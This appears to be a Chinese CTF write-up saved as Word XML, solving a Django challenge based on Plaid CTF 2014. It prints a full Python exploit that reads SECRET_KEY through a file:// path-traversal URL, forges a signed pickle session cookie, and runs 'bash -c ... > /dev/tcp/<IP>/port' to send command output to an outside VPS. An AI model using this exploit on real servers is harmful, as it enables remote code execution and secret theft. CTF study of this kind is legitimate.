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EF4" w:rsidRDefault="00AD6824" w:rsidP="00AD6824">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD6824">
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Django是世界上最好的框架</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6824" w:rsidRDefault="00AD6824" w:rsidP="00AD6824">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>注册，登录，偷车</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6824" w:rsidRDefault="00AD6824" w:rsidP="00AD6824">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="687D2BB6" wp14:editId="0450CCB2">
            <wp:extent cx="5274310" cy="29203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20365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6824" w:rsidRDefault="00AD6824" w:rsidP="00AD6824">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>主要的点在make处，图片URL点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6824" w:rsidRDefault="00AD6824" w:rsidP="00AD6824">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>本地执行，转发到我的VPS上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6824" w:rsidRDefault="00AD6824" w:rsidP="00AD6824">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="542E4C57" wp14:editId="13299DE6">
            <wp:extent cx="5274310" cy="13449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44930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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import mechanize,os</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import cPickle as pickle</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import socket,random</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MYIP = "45.78.55.148"</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HOST = "http://192.168.3.153/"</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myname = os.urandom(8).encode("hex")+"http:"</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br = mechanize.Browser()</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br.open(HOST+"register")</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lastRenderedPageBreak/>
        <w:t>reg = list(br.forms())[0]</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reg["username"] = myname</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reg["password"] = myname</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br.open(reg.click())</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i = 0</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def readfile(path):</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global i</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br.open(HOST+"make")</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mak = list(br.forms())[0]</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mak["url"] = "file:///tmp/memes/%s//../../../%s"%(myname,path)</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mak["text"] = "foo"</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try:</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br.open(mak.click())</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except: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pass #it will 500, that's okay</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dat = br.open(HOST+"view/%d"%(i%10)).read()</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i+=1</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return dat</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environ = readfile("/proc/self/environ")</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djpath = filter(lambda x:"PWD" == x[:3], environ.split("\x00"))[0].split("=")[1]</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appname = djpath[djpath.rindex("/")+1:]</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djbsettings = readfile(djpath + "/" + appname + "/settings.py")</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#LOL YES I KNOW, but I wrote the code and I know it doesn't do malicious things here</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exec(filter(lambda x:"SECRET_KEY" in x, djbsettings.split("\n"))[0])</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exec(filter(lambda x:"SESSION_ENGINE" in x, djbsettings.split("\n"))[0])</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import django.core.signing as d</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s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</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port = random.randint(9000,65000)</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port = 20000</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s.bind(('0.0.0.0',port))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print "listening on %d"%port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lastRenderedPageBreak/>
        <w:t>s.listen(5)</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pdata = "cos\nsystem\n(S'%s'\ntR." % (" bash -c 'ls &gt; /dev/tcp/%s/%d' "%(MYIP,port))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pdata = "cos\nsystem\n(S'%s'\ntR." % (" bash -c './flag &gt; /dev/tcp/%s/%d' "%(MYIP,port))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6824" w:rsidRPr="00AD6824" w:rsidRDefault="00AD6824" w:rsidP="00AD6824">
      <w:pPr>
        <w:pBdr>
          <w:between w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
      </w:pP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print(pdata)</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t = d.TimestampSigner(SECRET_KEY, salt=SESSION_ENGINE).sign(d.b64_encode(pdata))</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print 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br = mechanize.Browser()</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br.open(HOST)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br.set_cookie("sessionid="+t+";")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try:</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br.open(HOST)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except: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 xml:space="preserve">  pass</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client, addr = s.accept()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6824" w:rsidRPr="00AD6824" w:rsidRDefault="00AD6824" w:rsidP="00AD6824">
      <w:pPr>
        <w:pBdr>
          <w:between w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD6824">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>print addr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6824" w:rsidRDefault="00AD6824" w:rsidP="00AD6824">
      <w:pPr>
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD6824">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>print client.recv(1024)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6824" w:rsidRDefault="00AD6824" w:rsidP="00AD6824">
      <w:pPr>
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD6824" w:rsidRDefault="00AD6824" w:rsidP="00AD6824">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>会话数据存储在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>签名的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，并使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>pickle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>模块进行序列化，这意味着我们可以执行代码。而且，我们可以通过使用以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>开头的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>读取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>服务器上的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>任何文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>file://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这允许我们读取存储</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>签名机制使用的秘密的配置文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6824" w:rsidRDefault="00AD6824" w:rsidP="00AD6824">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD6824" w:rsidRDefault="00AD6824" w:rsidP="00AD6824">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>读取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>setting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>s.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SECRET_KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
      <w:r w:rsidR="009B6713">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="009B6713">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>"file://&lt;path&gt;#http://"</w:t>
      </w:r>
      <w:r w:rsidR="009B6713">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>用来读取服务器上的任何文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6824" w:rsidRPr="009B6713" w:rsidRDefault="009B6713" w:rsidP="00AD6824">
      <w:r w:rsidRPr="009B6713">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程代码执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6824" w:rsidRDefault="009B6713" w:rsidP="00AD6824">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将代码中的对象编码为在反序列化过程中执行的自定义基于堆栈的机器。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B6713" w:rsidRDefault="009B6713" w:rsidP="00AD6824">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00AD6824" w:rsidRDefault="00AD6824" w:rsidP="00AD6824">
      <w:pPr>
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD6824" w:rsidRDefault="00AD6824" w:rsidP="00AD6824">
      <w:pPr>
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD6824" w:rsidRDefault="00AD6824" w:rsidP="00AD6824">
      <w:pPr>
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD6824" w:rsidRDefault="00AD6824" w:rsidP="00AD6824">
      <w:pPr>
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD6824" w:rsidRPr="00AD6824" w:rsidRDefault="00AD6824" w:rsidP="00AD6824">
      <w:pPr>
        <w:pBdr>
          <w:between w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD6824">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参考与 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD6824">
        <w:t>Plaid CTF 2014: reeekeeeeee</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD6824">
        <w:t>https://github.com/ctfs/write-ups-2014/tree/master/plaid-ctf-2014/reeekeeeeee</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6824" w:rsidRDefault="00AD6824" w:rsidP="00AD6824">
      <w:pPr>
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD6824" w:rsidRPr="00AD6824" w:rsidRDefault="00AD6824" w:rsidP="00AD6824">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD6824" w:rsidRPr="00AD6824" w:rsidRDefault="00AD6824" w:rsidP="00AD6824">
      <w:pPr>
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD6824" w:rsidRPr="00AD6824" w:rsidRDefault="00AD6824" w:rsidP="00AD6824">
      <w:pPr>
        <w:pBdr>
          <w:between w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00AD6824" w:rsidRPr="00AD68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7D"/>
    <w:rsid w:val="0033107D"/>
    <w:rsid w:val="008B7EF4"/>
    <w:rsid w:val="009B6713"/>
    <w:rsid w:val="00AD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6D90"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B70E881E-2AE1-4201-83C9-E4215AF0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D6824"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AD682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吴小兵</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>吴小兵</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-05-07T11:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-05-07T12:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>